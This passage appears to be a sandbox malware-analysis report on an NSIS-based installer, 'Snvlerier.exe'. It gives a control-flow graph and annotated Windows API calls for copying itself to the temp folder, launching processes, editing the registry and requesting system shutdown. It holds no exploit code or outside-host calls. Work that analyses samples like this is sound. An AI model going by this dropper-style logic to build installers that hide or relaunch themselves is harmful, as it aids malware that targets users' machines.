3261->3300 3262 40140b 2 API calls 3297 403d3a 3262->3297 3263 403f88 DestroyWindow EndDialog 3263->3261 3264->3265 3264->3300 3269 403c0a 3265->3269 3272 403c51 SendMessageA 3265->3272 3273 403c1d 3265->3273 3280 403c02 3265->3280 3266->3300 3267->3300 3268 405d0f 18 API calls 3268->3297 3269->3272 3269->3280 3271 403ffd 19 API calls 3271->3297 3272->3258 3275 403c25 3273->3275 3276 403c3a 3273->3276 3274 403c38 3274->3258 3278 40140b 2 API calls 3275->3278 3277 40140b 2 API calls 3276->3277 3279 403c41 3277->3279 3278->3280 3279->3258 3279->3280 3313 403fd6 3280->3313 3281 403ffd 19 API calls 3282 403db5 GetDlgItem 3281->3282 3283 403dd2 ShowWindow KiUserCallbackDispatcher 3282->3283 3284 403dca 3282->3284 3310 40401f EnableWindow 3283->3310 3284->3283 3286 403dfc EnableWindow 3289 403e10 3286->3289 3287 403e15 GetSystemMenu EnableMenuItem SendMessageA 3288 403e45 SendMessageA 3287->3288 3287->3289 3288->3289 3289->3287 3311 404032 SendMessageA 3289->3311 3312 405ced lstrcpynA 3289->3312 3292 403e73 lstrlenA 3293 405d0f 18 API calls 3292->3293 3294 403e84 SetWindowTextA 3293->3294 3295 401389 2 API calls 3294->3295 3295->3297 3296 403ec8 DestroyWindow 3296->3261 3298 403ee2 CreateDialogParamA 3296->3298 3297->3262 3297->3263 3297->3268 3297->3271 3297->3281 3297->3296 3297->3300 3298->3261 3299 403f15 3298->3299 3301 403ffd 19 API calls 3299->3301 3302 403f20 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3301->3302 3303 401389 2 API calls 3302->3303 3304 403f66 3303->3304 3304->3300 3305 403f6e ShowWindow 3304->3305 3306 404049 SendMessageA 3305->3306 3306->3261 3308 404061 3307->3308 3309 404052 SendMessageA 3307->3309 3308->3297 3309->3308 3310->3286 3311->3289 3312->3292 3314 403fe3 SendMessageA 3313->3314 3315 403fdd 3313->3315 3314->3274 3315->3314 4156 40172c 4157 402a07 18 API calls 4156->4157 4158 401733 4157->4158 4159 4059ca 2 API calls 4158->4159 4160 40173a 4159->4160 4160->4160 4161 401dac 4162 4029ea 18 API calls 4161->4162 4163 401db2 4162->4163 4164 4029ea 18 API calls 4163->4164 4165 401dbb 4164->4165 4166 401dc2 ShowWindow 4165->4166 4167 401dcd EnableWindow 4165->4167 4168 40289c 4166->4168 4167->4168 4169 401eac 4170 402a07 18 API calls 4169->4170 4171 401eb3 4170->4171 4172 405ff1 2 API calls 4171->4172 4173 401eb9 4172->4173 4175 401ecb 4173->4175 4176 405c4b wsprintfA 4173->4176 4176->4175 4177 40192d 4178 402a07 18 API calls 4177->4178 4179 401934 lstrlenA 4178->4179 4180 4024c9 4179->4180 4181 4024ad 4182 402a07 18 API calls 4181->4182 4183 4024b4 4182->4183 4186 40599b GetFileAttributesA CreateFileA 4183->4186 4185 4024c0 4186->4185 4187 401cb0 4188 4029ea 18 API calls 4187->4188 4189 401cc0 SetWindowLongA 4188->4189 4190 40289c 4189->4190 4191 401a31 4192 4029ea 18 API calls 4191->4192 4193 401a37 4192->4193 4194 4029ea 18 API calls 4193->4194 4195 4019e1 4194->4195 2977 401e32 2978 402a07 18 API calls 2977->2978 2979 401e38 2978->2979 2993 404ffa 2979->2993 2983 401e9e CloseHandle 2985 40266d 2983->2985 2984 401e67 WaitForSingleObject 2986 401e48 2984->2986 2987 401e75 GetExitCodeProcess 2984->2987 2986->2983 2986->2984 2986->2985 3007 406051 2986->3007 2989 401e92 2987->2989 2990 401e87 2987->2990 2989->2983 2992 401e90 2989->2992 3011 405c4b wsprintfA 2990->3011 2992->2983 2994 405015 2993->2994 3003 401e42 2993->3003 2995 405032 lstrlenA 2994->2995 2996 405d0f 18 API calls 2994->2996 2997 405040 lstrlenA 2995->2997 2998 40505b 2995->2998 2996->2995 2999 405052 lstrcatA 2997->2999 2997->3003 3000 405061 SetWindowTextA 2998->3000 3001 40506e 2998->3001 2999->2998 3000->3001 3002 405074 SendMessageA SendMessageA SendMessageA 3001->3002 3001->3003 3002->3003 3004 4054bd CreateProcessA 3003->3004 3005 4054f8 3004->3005 3006 4054ec CloseHandle 3004->3006 3005->2986 3006->3005 3008 40606e PeekMessageA 3007->3008 3009 406064 DispatchMessageA 3008->3009 3010 40607e 3008->3010 3009->3008 3010->2984 3011->2992 3012 4015b3 3013 402a07 18 API calls 3012->3013 3014 4015ba 3013->3014 3030 405833 CharNextA CharNextA 3014->3030 3016 40160a 3017 401638 3016->3017 3018 40160f 3016->3018 3022 401423 25 API calls 3017->3022 3036 401423 3018->3036 3019 4057c5 CharNextA 3021 4015d0 CreateDirectoryA 3019->3021 3024 4015e5 GetLastError 3021->3024 3027 4015c2 3021->3027 3029 401630 3022->3029 3026 4015f2 GetFileAttributesA 3024->3026 3024->3027 3026->3027 3027->3016 3027->3019 3028 401621 SetCurrentDirectoryA 3028->3029 3031 40584e 3030->3031 3034 40585e 3030->3034 3033 405859 CharNextA 3031->3033 3031->3034 3032 40587e 3032->3027 3033->3032 3034->3032 3035 4057c5 CharNextA 3034->3035 3035->3034 3037 404ffa 25 API calls 3036->3037 3038 401431 3037->3038 3039 405ced lstrcpynA 3038->3039 3039->3028 4196 402036 4197 402a07 18 API calls 4196->4197 4198 40203d 4197->4198 4199 402a07 18 API calls 4198->4199 4200 402047 4199->4200 4201 402a07 18 API calls 4200->4201 4202 402050 4201->4202 4203 402a07 18 API calls 4202->4203 4204 40205a 4203->4204 4205 402a07 18 API calls 4204->4205 4206 402064 4205->4206 4207 402078 CoCreateInstance 4206->4207 4208 402a07 18 API calls 4206->4208 4211 402097 4207->4211 4212 40214d 4207->4212 4208->4207 4209 401423 25 API calls 4210 40217f 4209->4210 4211->4212 4213 40212c MultiByteToWideChar 4211->4213 4212->4209 4212->4210 4213->4212 4214 4014b7 4215 4014bd 4214->4215 4216 401389 2 API calls 4215->4216 4217 4014c5 4216->4217 4218 405138 4219 4052e4 4218->4219 4220 405159 GetDlgItem GetDlgItem GetDlgItem 4218->4220 4222 405315 4219->4222 4223 4052ed GetDlgItem CreateThread CloseHandle 4219->4223 4264 404032 SendMessageA 4220->4264 4225 405340 4222->4225 4226 405362 4222->4226 4227 40532c ShowWindow ShowWindow 4222->4227 4223->4222 4224 4051ca 4229 4051d1 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4224->4229 4228 40539e 4225->4228 4231 405351 4225->4231 4232 405377 ShowWindow 4225->4232 4233 404064 8 API calls 4226->4233 4266 404032 SendMessageA 4227->4266 4228->4226 4238 4053a9 SendMessageA 4228->4238 4236 405240 4229->4236 4237 405224 SendMessageA SendMessageA 4229->4237 4239 403fd6 SendMessageA 4231->4239 4234 405397 4232->4234 4235 405389 4232->4235 4245 405370 4233->4245 4241 403fd6 SendMessageA 4234->4241 4240 404ffa 25 API calls 4235->4240 4242 405253 4236->4242 4243 405245 SendMessageA 4236->4243 4237->4236 4244 4053c2 CreatePopupMenu 4238->4244 4238->4245 4239->4226 4240->4234 4241->4228 4247 403ffd 19 API calls 4242->4247 4243->4242 4246 405d0f 18 API calls 4244->4246 4248 4053d2 AppendMenuA 4246->4248 4249 405263 4247->4249 4250 4053e5 GetWindowRect 4248->4250 4251 4053f8 4248->4251 4252 4052a0 GetDlgItem SendMessageA 4249->4252 4253 40526c ShowWindow 4249->4253 4255 405401 TrackPopupMenu 4250->4255 4251->4255 4252->4245 4254 4052c7 SendMessageA SendMessageA 4252->4254 4256 405282 ShowWindow 4253->4256 4257 40528f 4253->4257 4254->4245 4255->4245 4258 40541f 4255->4258 4256->4257 4265 404032 SendMessageA 4257->4265 4260 40543b SendMessageA 4258->4260 4260->4260 4261 405458 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4261 4262 40547a SendMessageA 4261->4262 4262->4262 4263 40549c GlobalUnlock SetClipboardData CloseClipboard 4262->4263 4263->4245 4264->4224 4265->4252 4266->4225 4267 402438 4268 402b11 19 API calls 4267->4268 4269 402442 4268->4269 4270 4029ea 18 API calls 4269->4270 4271 40244b 4270->4271 4272 402462 RegEnumKeyA 4271->4272 4273 40246e RegEnumValueA 4271->4273 4275 40266d 4271->4275 4274 402487 RegCloseKey 4272->4274 4273->4274 4273->4275 4274->4275 4277 401bb8 4278 4029ea 18 API calls 4277->4278 4279 401bbf 4278->4279 4280 4029ea 18 API calls 4279->4280 4281 401bc9 4280->4281 4282 401bd9 4281->4282 4283 402a07 18 API calls 4281->4283 4284 401be9 4282->4284 4285 402a07 18 API calls 4282->4285 4283->4282 4286 401bf4 4284->4286 4287 401c38 4284->4287 4285->4284 4289 4029ea 18 API calls 4286->4289 4288 402a07 18 API calls 4287->4288 4290 401c3d 4288->4290 4291 401bf9 4289->4291 4292 402a07 18 API calls 4290->4292 4293 4029ea 18 API calls 4291->4293 4295 401c46 FindWindowExA 4292->4295 4294 401c02 4293->4294 4296 401c28 SendMessageA 4294->4296 4297 401c0a SendMessageTimeoutA 4294->4297 4298 401c64 4295->4298 4296->4298 4297->4298 4299 402239 4300 402241 4299->4300 4302 402247 4299->4302 4301 402a07 18 API calls 4300->4301 4301->4302 4303 402257 4302->4303 4305 402a07 18 API calls 4302->4305 4304 402265 4303->4304 4306 402a07 18 API calls 4303->4306 4307 402a07 18 API calls 4304->4307 4305->4303 4306->4304 4308 40226e WritePrivateProfileStringA 4307->4308 4309 4069ba 4312 40614b 4309->4312 4310 4061d5 GlobalAlloc 4310->4312 4313 406ab6 4310->4313 4311 4061cc GlobalFree 4311->4310 4312->4310 4312->4311 4312->4312 4312->4313 4314 406243 GlobalFree 4312->4314 4315 40624c GlobalAlloc 4312->4315 4314->4315 4315->4312 4315->4313 4316 40443b 4317 404467 4316->4317 4318 404478 4316->4318 4377 405502 GetDlgItemTextA 4317->4377 4320 404484 GetDlgItem 4318->4320 4326 4044e3 4318->4326 4323 404498 4320->4323 4321 4045c7 4375 404762 4321->4375 4379 405502 GetDlgItemTextA 4321->4379 4322 404472 4324 405f58 5 API calls 4322->4324 4325 4044ac SetWindowTextA 4323->4325 4328 405833 4 API calls 4323->4328 4324->4318 4329 403ffd 19 API calls 4325->4329 4326->4321 4330 405d0f 18 API calls 4326->4330 4326->4375 4333 4044a2 4328->4333 4334 4044c8 4329->4334 4335 404557 SHBrowseForFolderA 4330->4335 4331 4045f7 4336 405888 18 API calls 4331->4336 4332 404064 8 API calls 4337 404776 4332->4337 4333->4325 4341 40579a 3 API calls 4333->4341 4338 403ffd 19 API calls 4334->4338 4335->4321 4339 40456f CoTaskMemFree 4335->4339 4340 4045fd 4336->4340 4342 4044d6 4338->4342 4343 40579a 3 API calls 4339->4343 4380 405ced lstrcpynA 4340->4380 4341->4325 4378 404032 SendMessageA 4342->4378 4345 40457c 4343->4345 4348 4045b3 SetDlgItemTextA 4345->4348 4352 405d0f 18 API calls 4345->4352 4347 4044dc 4350 406018 3 API calls 4347->4350 4348->4321 4349 404614 4351 406018 3 API calls 4349->4351 4350->4326 4363 40461c 4351->4363 4353 40459b lstrcmpiA 4352->4353 4353->4348 4356 4045ac lstrcatA 4353->4356 4354 404656 4381 405ced lstrcpynA 4354->4381 4356->4348 4357 40465d 4358 405833 4 API calls 4357->4358 4359 404663 GetDiskFreeSpaceA 4358->4359 4362 404685 MulDiv 4359->4362 4364 4046a7 4359->4364 4361 4057e1 2 API calls 4361->4363 4362->4364 4363->4354 4363->4361 4363->4364 4365 404711 4364->4365 4367 4047e3 21 API calls 4364->4367 4366 404734 4365->4366 4368 40140b 2 API calls 4365->4368 4382 40401f EnableWindow 4366->4382 4369 404703 4367->4369 4368->4366 4371 404713 SetDlgItemTextA 4369->4371 4372 404708 4369->4372 4371->4365 4374 4047e3 21 API calls 4372->4374 4373 404750 4373->4375 4376 4043d0 SendMessageA 4373->4376 4374->4365 4375->4332 4376->4375 4377->4322 4378->4347 4379->4331 4380->4349 4381->4357 4382->4373 3662 4022be 3663 4022c3 3662->3663 3664 4022ee 3662->3664 3665 402b11 19 API calls 3663->3665 3666 402a07 18 API calls 3664->3666 3667 4022ca 3665->3667 3668 4022f5 3666->3668 3669 4022d4 3667->3669 3674 40230d 3667->3674 3675 402a47 RegOpenKeyExA 3668->3675 3670 402a07 18 API calls 3669->3670 3671 4022db RegDeleteValueA RegCloseKey 3670->3671 3671->3674 3678 402a72 3675->3678 3683 40230b 3675->3683 3676 402a98 RegEnumKeyA 3677 402aaa RegCloseKey 3676->3677 3676->3678 3680 406018 3 API calls 3677->3680 3678->3676 3678->3677 3679 402acf RegCloseKey 3678->3679 3681 402a47 3 API calls 3678->3681 3679->3683 3682 402aba 3680->3682 3681->3678 3682->3683 3684 402aea RegDeleteKeyA 3682->3684 3683->3674 3684->3683 3685 40173f 3686 402a07 18 API calls 3685->3686 3687 401746 3686->3687 3688 401764 3687->3688 3689 40176c 3687->3689 3724 405ced lstrcpynA 3688->3724 3725 405ced lstrcpynA 3689->3725 3692 40176a 3696 405f58 5 API calls 3692->3696 3693 401777 3694 40579a 3 API calls 3693->3694 3695 40177d lstrcatA 3694->3695 3695->3692 3698 401789 3696->3698 3697 405ff1 2 API calls 3697->3698 3698->3697 3699 405976 2 API calls 3698->3699 3701 4017a0 CompareFileTime 3698->3701 3702 401864 3698->3702 3704 40183b 3698->3704 3707 405ced lstrcpynA 3698->3707 3711 405d0f 18 API calls 3698->3711 3719 40551e MessageBoxIndirectA 3698->3719 3723 40599b GetFileAttributesA CreateFileA 3698->3723 3699->3698 3701->3698 3703 404ffa 25 API calls 3702->3703 3705 40186e 3703->3705 3706 404ffa 25 API calls 3704->3706 3713 401850 3704->3713 3708 402f29 48 API calls 3705->3708 3706->3713 3707->3698 3709 401881 3708->3709 3710 401895 SetFileTime 3709->3710 3712 4018a7 CloseHandle 3709->3712 3710->3712 3711->3698 3712->3713 3714 4018b8 3712->3714 3715 4018d0 3714->3715 3716 4018bd 3714->3716 3718 405d0f 18 API calls 3715->3718 3717 405d0f 18 API calls 3716->3717 3720 4018c5 lstrcatA 3717->3720 3721 4018d8 3718->3721 3719->3698 3720->3721 3722 40551e MessageBoxIndirectA 3721->3722 3722->3713 3723->3698 3724->3692 3725->3693 4383 40163f 4384 402a07 18 API calls 4383->4384 4385 401645 4384->4385 4386 405ff1 2 API calls 4385->4386 4387 40164b 4386->4387 4388 40193f 4389 4029ea 18 API calls 4388->4389 4390 401946 4389->4390 4391 4029ea 18 API calls 4390->4391 4392 401950 4391->4392 4393 402a07 18 API calls 4392->4393 4394 401959 4393->4394 4395 40196c lstrlenA 4394->4395 4397 4019a7 4394->4397 4396 401976 4395->4396 4396->4397 4401 405ced lstrcpynA 4396->4401 4399 401990 4399->4397 4400 40199d lstrlenA 4399->4400 4400->4397 4401->4399

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 40324d-4032e4 #17 SetErrorMode OleInitialize call 406018 SHGetFileInfoA call 405ced GetCommandLineA call 405ced GetModuleHandleA 7 4032f0-403305 call 4057c5 CharNextA 0->7 8 4032e6-4032eb 0->8 11 4033c5-4033c9 7->11 8->7 12 40330a-40330d 11->12 13 4033cf 11->13 14 403315-40331d 12->14 15 40330f-403313 12->15 16 4033e2-4033fc GetTempPathA call 403219 13->16 18 403325-403328 14->18 19 40331f-403320 14->19 15->14 15->15 25 403454-40346e DeleteFileA call 402c83 16->25 26 4033fe-40341c GetWindowsDirectoryA lstrcatA call 403219 16->26 20 4033b5-4033c2 call 4057c5 18->20 21 40332e-403332 18->21 19->18 20->11 40 4033c4 20->40 23 403334-40333a 21->23 24 403345-403372 21->24 28 403340 23->28 29 40333c-40333e 23->29 30 403374-40337a 24->30 31 403385-4033b3 24->31 43 403502-403511 call 4036a6 OleUninitialize 25->43 44 403474-40347a 25->44 26->25 42 40341e-40344e GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403219 26->42 28->24 29->24 29->28 35 403380 30->35 36 40337c-40337e 30->36 31->20 38 4033d1-4033dd call 405ced 31->38 35->31 36->31 36->35 38->16 40->11 42->25 42->43 54 403517-403527 call 40551e ExitProcess 43->54 55 40360b-403611 43->55 47 4034f2-4034f9 call 403798 44->47 48 40347c-403487 call 4057c5 44->48 56 4034fe 47->56 57 403489-4034b2 48->57 58 4034bd-4034c7 48->58 60 403613-403630 call 406018 * 3 55->60 61 40368e-403696 55->61 56->43 62 4034b4-4034b6 57->62 65 4034c9-4034d6 call 405888 58->65 66 40352d-403547 lstrcatA lstrcmpiA 58->66 87 403632-403634 60->87 88 40367a-403685 ExitWindowsEx 60->88 63 403698 61->63 64 40369c-4036a0 ExitProcess 61->64 62->58 70 4034b8-4034bb 62->70 63->64 65->43 78 4034d8-4034ee call 405ced * 2 65->78 66->43 72 403549-40355e CreateDirectoryA SetCurrentDirectoryA 66->72 70->58 70->62 75 403560-403566 call 405ced 72->75 76 40356b-403593 call 405ced 72->76 75->76 86 403599-4035b5 call 405d0f DeleteFileA 76->86 78->47 96 4035f6-4035fd 86->96 97 4035b7-4035c7 CopyFileA 86->97 87->88 91 403636-403638 87->91 88->61 93 403687-403689 call 40140b 88->93 91->88 98 40363a-40364c GetCurrentProcess 91->98 93->61 96->86 100 4035ff-403606 call 405ba1 96->100 97->96 99 4035c9-4035e9 call 405ba1 call 405d0f call 4054bd 97->99 98->88 105 40364e-403670 98->105 99->96 112 4035eb-4035f2 CloseHandle 99->112 100->43 105->88 112->96
                                              APIs
                                              • #17.COMCTL32 ref: 0040326E
                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403279
                                              • OleInitialize.OLE32(00000000), ref: 00403280
                                                • Part of subcall function 00406018: GetModuleHandleA.KERNEL32(?,?,?,00403292,00000008), ref: 0040602A
                                                • Part of subcall function 00406018: LoadLibraryA.KERNELBASE(?,?,?,00403292,00000008), ref: 00406035
                                                • Part of subcall function 00406018: GetProcAddress.KERNEL32(00000000,?), ref: 00406046
                                              • SHGetFileInfoA.SHELL32(0041F4A0,00000000,?,00000160,00000000,00000008), ref: 004032A8
                                                • Part of subcall function 00405CED: lstrcpynA.KERNEL32(?,?,00000400,004032BD,Nonchaotically Setup,NSIS Error), ref: 00405CFA
                                              • GetCommandLineA.KERNEL32(Nonchaotically Setup,NSIS Error), ref: 004032BD
                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Snvlerier.exe",00000000), ref: 004032D0
                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Snvlerier.exe",00000020), ref: 004032FB
                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033F3
                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403404
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403410
                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403424
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040342C
                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040343D
                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403445
                                              • DeleteFileA.KERNELBASE(1033), ref: 00403459
                                              • OleUninitialize.OLE32(?), ref: 00403507
                                              • ExitProcess.KERNEL32 ref: 00403527
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Snvlerier.exe",00000000,?), ref: 00403533
                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040353F
                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040354B
                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403552
                                              • DeleteFileA.KERNEL32(0041F0A0,0041F0A0,?,00424000,?), ref: 004035AB
                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\Snvlerier.exe,0041F0A0,00000001), ref: 004035BF
                                              • CloseHandle.KERNEL32(00000000,0041F0A0,0041F0A0,?,0041F0A0,00000000), ref: 004035EC
                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403641
                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040367D
                                              • ExitProcess.KERNEL32 ref: 004036A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                              • String ID: "$"C:\Users\user\Desktop\Snvlerier.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\carinal\Coracosteon$C:\Users\user\AppData\Local\Temp\carinal\Coracosteon$C:\Users\user\Desktop$C:\Users\user\Desktop\Snvlerier.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$Nonchaotically Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                              • API String ID: 4107622049-1670688977
                                              • Opcode ID: da47f1ca6c7d5be8086c7df03f95acf7ce125906caf252fd23ee14ab270675fe
                                              • Instruction ID: b9a063515342d19edc65aa42ec8bcfc2220f2735a7a201cbc0636cf08ebd7ad4
                                              • Opcode Fuzzy Hash: da47f1ca6c7d5be8086c7df03f95acf7ce125906caf252fd23ee14ab270675fe
                                              • Instruction Fuzzy Hash: 79B10770A083516AE7216F61AD4DA2B3EECAB45706F04447FF541B62E2C77C8E05CB6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 113 404977-4049c3 GetDlgItem * 2 114 404be3-404bea 113->114 115 4049c9-404a5d GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 113->115 116 404bec-404bfc 114->116 117 404bfe 114->117 118 404a6c-404a73 DeleteObject 115->118 119 404a5f-404a6a SendMessageA 115->119 120 404c01-404c0a 116->120 117->120 121 404a75-404a7d 118->121 119->118 122 404c15-404c1b 120->122 123 404c0c-404c0f 120->123 124 404aa6-404aaa 121->124 125 404a7f-404a82 121->125 130 404c2a-404c31 122->130 131 404c1d-404c24 122->131 123->122 127 404cf9-404d00 123->127 124->121 126 404aac-404ad8 call 403ffd * 2 124->126 128 404a84 125->128 129 404a87-404aa4 call 405d0f SendMessageA * 2 125->129 169 404ba2-404bb5 GetWindowLongA SetWindowLongA 126->169 170 404ade-404ae4 126->170 133 404d71-404d79 127->133 134 404d02-404d08 127->134 128->129 129->124 136 404c33-404c36 130->136 137 404ca6-404ca9 130->137 131->127 131->130 144 404d83-404d8a 133->144 145 404d7b-404d81 SendMessageA 133->145 141 404f59-404f6b call 404064 134->141 142 404d0e-404d18 134->142 138 404c41-404c56 call 4048c5 136->138 139 404c38-404c3f 136->139 137->127 143 404cab-404cb5 137->143 138->137 168 404c58-404c69 138->168 139->137 139->138 142->141 151 404d1e-404d2d SendMessageA 142->151 153 404cc5-404ccf 143->153 154 404cb7-404cc3 SendMessageA 143->154 147 404d8c-404d93 144->147 148 404dbe-404dc5 144->148 145->144 156 404d95-404d96 ImageList_Destroy 147->156 157 404d9c-404da3 147->157 160 404f1b-404f22 148->160 161 404dcb-404dd7 call 4011ef 148->161 151->141 162 404d33-404d44 SendMessageA 151->162 153->127 155 404cd1-404cdb 153->155 154->153 164 404cec-404cf6 155->164 165 404cdd-404cea 155->165 156->157 166 404da5-404da6 GlobalFree 157->166 167 404dac-404db8 157->167 160->141 174 404f24-404f2b 160->174 187 404de7-404dea 161->187 188 404dd9-404ddc 161->188 172 404d46-404d4c 162->172 173 404d4e-404d50 162->173 164->127 165->127 166->167 167->148 168->137 176 404c6b-404c6d 168->176 175 404bbb-404bbf 169->175 177 404ae7-404aed 170->177 172->173 179 404d51-404d6a call 401299 SendMessageA 172->179 173->179 174->141 180 404f2d-404f57 ShowWindow GetDlgItem ShowWindow 174->180 181 404bc1-404bd4 ShowWindow call 404032 175->181 182 404bd9-404be1 call 404032 175->182 183 404c80 176->183 184 404c6f-404c76 176->184 185 404b83-404b96 177->185 186 404af3-404b1b 177->186 179->133 180->141 181->141 182->114 196 404c83-404c9f call 40117d 183->196 192 404c78-404c7a 184->192 193 404c7c-404c7e 184->193 185->177 200 404b9c-404ba0 185->200 194 404b55-404b57 186->194 195 404b1d-404b53 SendMessageA 186->195 201 404e2b-404e4f call 4011ef 187->201 202 404dec-404e05 call 4012e2 call 401299 187->202 197 404dde 188->197 198 404ddf-404de2 call 404945 188->198 192->196 193->196 207 404b59-404b68 SendMessageA 194->207 208 404b6a-404b80 SendMessageA 194->208 195->185 196->137 197->198 198->187 200->169 200->175 215 404ef1-404f05 InvalidateRect 201->215 216 404e55 201->216 220 404e15-404e24 SendMessageA 202->220 221 404e07-404e0d 202->221 207->185 208->185 215->160 218 404f07-404f16 call 404898 call 4047e3 215->218 219 404e58-404e63 216->219 218->160 222 404e65-404e74 219->222 223 404ed9-404eeb 219->223 220->201 225 404e10-404e13 221->225 226 404e0f 221->226 228 404e76-404e83 222->228 229 404e87-404e8a 222->229 223->215 223->219 225->220 225->221 226->225 228->229 230 404e91-404e9a 229->230 231 404e8c-404e8f 229->231 233 404e9f-404ed7 SendMessageA * 2 230->233 234 404e9c 230->234 231->233 233->223 234->233
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 0040498F
                                              • GetDlgItem.USER32(?,00000408), ref: 0040499A
                                              • GlobalAlloc.KERNEL32(00000040,00000001), ref: 004049E4
                                              • LoadBitmapA.USER32(0000006E), ref: 004049F7
                                              • SetWindowLongA.USER32(?,000000FC,00404F6E), ref: 00404A10
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A24
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A36
                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404A4C
                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A58
                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A6A
                                              • DeleteObject.GDI32(00000000), ref: 00404A6D
                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A98
                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AA4
                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B39
                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B78
                                              • GetWindowLongA.USER32(?,000000F0), ref: 00404BA7
                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404BB5
                                              • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CC3
                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                              • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                              • GlobalFree.KERNEL32(?), ref: 00404DA6
                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404EC8
                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404ED7
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                              • ShowWindow.USER32(?,00000000), ref: 00404F45
                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                              • ShowWindow.USER32(00000000), ref: 00404F57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
